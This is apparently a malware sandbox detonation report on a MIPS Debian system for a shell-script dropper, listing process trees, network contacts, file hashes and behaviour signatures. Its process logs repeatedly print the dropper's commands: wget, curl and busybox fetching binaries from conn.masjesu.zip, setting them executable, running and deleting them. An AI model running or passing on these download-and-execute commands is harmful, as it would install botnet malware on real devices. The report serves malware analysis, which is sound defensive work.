/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk
[./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/rm
[rm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/chmod
[chmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp
[./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/rm
[rm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 02:08
Reported
2024-11-24 02:10
Platform
debian9-mipsel-20240611-en
Max time kernel
120s
Max time network
118s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | N/A |
| N/A | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | N/A |
| N/A | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | N/A |
| N/A | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | N/A |
| N/A | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | N/A |
| N/A | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | N/A |
| N/A | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | N/A |
| N/A | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | N/A |
| N/A | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | N/A |
| N/A | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | N/A |
| N/A | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | N/A |
| N/A | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | N/A |
| N/A | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | N/A |
| N/A | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | N/A |
| N/A | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | N/A |
| N/A | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | N/A |
| N/A | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | N/A |
| N/A | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | N/A |
| N/A | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | N/A |
| N/A | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | N/A |
| N/A | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | N/A |
| N/A | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | N/A |
| N/A | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | N/A |
| N/A | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | N/A |
| N/A | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | N/A |
| N/A | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | N/A |
| N/A | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | N/A |
| N/A | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | /usr/bin/curl | N/A |
Processes
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
[/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/chmod
[chmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm
[./9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/rm
[rm 9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/chmod
[chmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi
[./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/rm
[rm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/chmod
[chmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S
[./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/rm
[rm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/chmod
[chmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK
[./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/rm
[rm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/chmod
[chmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9
[./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/rm
[rm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/chmod
[chmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk
[./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/rm
[rm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/chmod
[chmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp
[./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/rm
[rm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/bin/busybox
